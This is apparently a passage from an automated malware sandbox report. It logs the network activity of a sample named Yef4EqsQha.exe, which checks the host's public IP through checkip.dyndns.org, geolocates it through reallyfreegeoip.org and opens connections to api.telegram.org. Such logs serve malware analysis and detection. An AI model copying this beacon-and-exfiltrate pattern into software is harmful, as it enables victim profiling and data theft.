                                                                                                            Jan 10, 2025 23:10:25.257605076 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:25.257625103 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.257916927 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.443640947 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.002281904 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.002507925 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.002629995 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.004834890 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.004884958 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.005116940 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.005417109 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.005439997 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.636681080 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.636780977 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.638433933 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.638448000 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.638688087 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.692662001 CET50239443192.168.2.7149.154.167.220
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 10, 2025 23:06:15.253376007 CET | 61316 | 53 | 192.168.2.7 | 1.1.1.1 |
| Jan 10, 2025 23:06:23.155838013 CET | 55716 | 53 | 192.168.2.7 | 1.1.1.1 |
| Jan 10, 2025 23:06:23.163252115 CET | 53 | 55716 | 1.1.1.1 | 192.168.2.7 |
| Jan 10, 2025 23:06:24.705132008 CET | 54803 | 53 | 192.168.2.7 | 1.1.1.1 |
| Jan 10, 2025 23:06:24.712431908 CET | 53 | 54803 | 1.1.1.1 | 192.168.2.7 |
| Jan 10, 2025 23:06:35.759605885 CET | 54759 | 53 | 192.168.2.7 | 1.1.1.1 |
| Jan 10, 2025 23:06:35.766526937 CET | 53 | 54759 | 1.1.1.1 | 192.168.2.7 |
| Jan 10, 2025 23:07:10.113006115 CET | 61610 | 53 | 192.168.2.7 | 1.1.1.1 |
| Jan 10, 2025 23:07:10.119829893 CET | 53 | 61610 | 1.1.1.1 | 192.168.2.7 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 10, 2025 23:06:15.253376007 CET | 192.168.2.7 | 1.1.1.1 | 0x8511 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.155838013 CET | 192.168.2.7 | 1.1.1.1 | 0xea3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.705132008 CET | 192.168.2.7 | 1.1.1.1 | 0xa57e | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:35.759605885 CET | 192.168.2.7 | 1.1.1.1 | 0x5020 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:07:10.113006115 CET | 192.168.2.7 | 1.1.1.1 | 0x6a32 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 10, 2025 23:06:15.260225058 CET | 1.1.1.1 | 192.168.2.7 | 0x8511 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 23:06:18.002077103 CET | 1.1.1.1 | 192.168.2.7 | 0x5b9a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 23:06:18.002077103 CET | 1.1.1.1 | 192.168.2.7 | 0x5b9a | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:23.163252115 CET | 1.1.1.1 | 192.168.2.7 | 0xea3 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:24.712431908 CET | 1.1.1.1 | 192.168.2.7 | 0xa57e | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:35.766526937 CET | 1.1.1.1 | 192.168.2.7 | 0x5020 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:38.578043938 CET | 1.1.1.1 | 192.168.2.7 | 0xaa02 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:38.578043938 CET | 1.1.1.1 | 192.168.2.7 | 0xaa02 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:51.981551886 CET | 1.1.1.1 | 192.168.2.7 | 0xddda | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:06:51.981551886 CET | 1.1.1.1 | 192.168.2.7 | 0xddda | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 23:07:10.119829893 CET | 1.1.1.1 | 192.168.2.7 | 0x6a32 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
                                                                                                            Jan 10, 2025 23:09:34.771842003 CET1.1.1.1192.168.2.70x85f4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:34.771842003 CET1.1.1.1192.168.2.70x85f4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:40.572637081 CET1.1.1.1192.168.2.70x9c30No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:40.572637081 CET1.1.1.1192.168.2.70x9c30No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49732 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:23.174691916 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:24.460573912 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:06:24.464193106 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:06:24.663239956 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:06:25.595396996 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:06:25.783324957 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:25 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49757 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:26.409161091 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:06:27.053514004 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49770 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:27.672051907 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:28.323019028 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49779 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:29.243932009 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:29.871208906 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:29 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49790 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:30.472919941 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:31.113214970 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49801 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:31.844506979 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:32.475076914 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49811 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:33.107426882 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:33.734648943 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49821 | 193.122.6.168 | 80 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:34.342881918 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:06:35.012502909 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49744 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:25 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:06:25 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:06:25 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1861574
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKFVMrN0chdDFX%2ByYayWl9ymUXPCGvOZSvqa%2FORBHUZaGrBX5QzFfZ9lr%2F4jwZl55g0oSRQq3rlbSX14gbX7YiLNxF4EQ3iuDJ6z4Lae1spR8xFKIfAyQ%2FsXDkTmjimQ6xr5SHAs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffff9604cdc43b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1569&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1766485&cwnd=203&unsent_bytes=0&cid=0eccfcdb911abc40&ts=217&x=0"
2025-01-10 22:06:25 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49751 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:26 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 22:06:26 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:26 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861575
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KS3%2BoRDUtOmMdQ3p0%2BdsYTdUYsbInvz%2FvJ3DiiaVTNRLxLEjA96pW8EFoGgEVWpS4yNsYjEsWF2R1wa790sHG7yIuuHAf5mYlrTcWUP9PN3YhoO2mguZ6%2F0j3eDAatf8ePTBTi%2BR"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9669e12424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1587&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1839949&cwnd=248&unsent_bytes=0&cid=9825ce997dde88ba&ts=141&x=0"
2025-01-10 22:06:26 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49764 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:27 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:06:27 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:27 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861576
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9ncgwhDlIPOCJL%2FXOOoXvbbPNw7T22YanQ4LL7Op%2BNqV4qgz7IqWPk%2FCxjTDAtaVnGkYz9joGeyWu3Sg1g9wk7BRs6hSiRsiP3xliL9tDv5oq1csBDW%2FT3CiKGNlfY3QhPfYIjX"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff96e7b5f729f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1897&min_rtt=1896&rtt_var=714&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1530398&cwnd=169&unsent_bytes=0&cid=e6eba409e175d3fd&ts=136&x=0"
2025-01-10 22:06:27 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49773 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:28 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 22:06:29 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:28 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861578
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=39rVfg3BgC6AKstuD4weyiqIi7EBSaBlk2LWaQuABRLM83sVoGXFKqRpl9zl7MPYwEeOcrzS9hHQ5INV8B9nJPXaJKExdUnT1FwhxIKtjk5NXWeZ%2BF5dQ0mP6LN5bQwzZ9Hx%2BMp4"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9769f01727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1995&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1427872&cwnd=234&unsent_bytes=0&cid=daf4a28d8840a8a1&ts=166&x=0"
2025-01-10 22:06:29 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49784 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:30 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:06:30 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:30 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861579
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lfn1FqyKFVq8lkUhMgDDawLL4DtfiiexX2BOQrrRmGp%2BfGBhGg7SgFwr90VG5ANnVkM4nL7UDeCuj%2BvOQP9NAl4m4HbeyMUkOvIVC4ZUFikxeUgDjppUvZsLvx801OUzz5GLfZx1"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff97ffd4b727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1462925&cwnd=234&unsent_bytes=0&cid=a9b0457a1b3542be&ts=138&x=0"
2025-01-10 22:06:30 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49796 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:31 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:06:31 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:31 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861580
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kC%2FQnu07UBQJ1MR9WLt9XNYivstcLyz15iiqu1ZhIpg8moRnzvF6vQ8KAQLloeOArEqCdhA4rhuQSS4i6l4F7isJuBy%2FW6KihiTt3%2B%2BDwXgcjvHKQQ1QD2qq2LTI%2FQ8cwGa6joGv"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff987ed87c34f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1429&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1885087&cwnd=181&unsent_bytes=0&cid=d3aa17bf273dbae7&ts=163&x=0"
2025-01-10 22:06:31 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49807 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:32 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 22:06:33 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:33 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861582
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
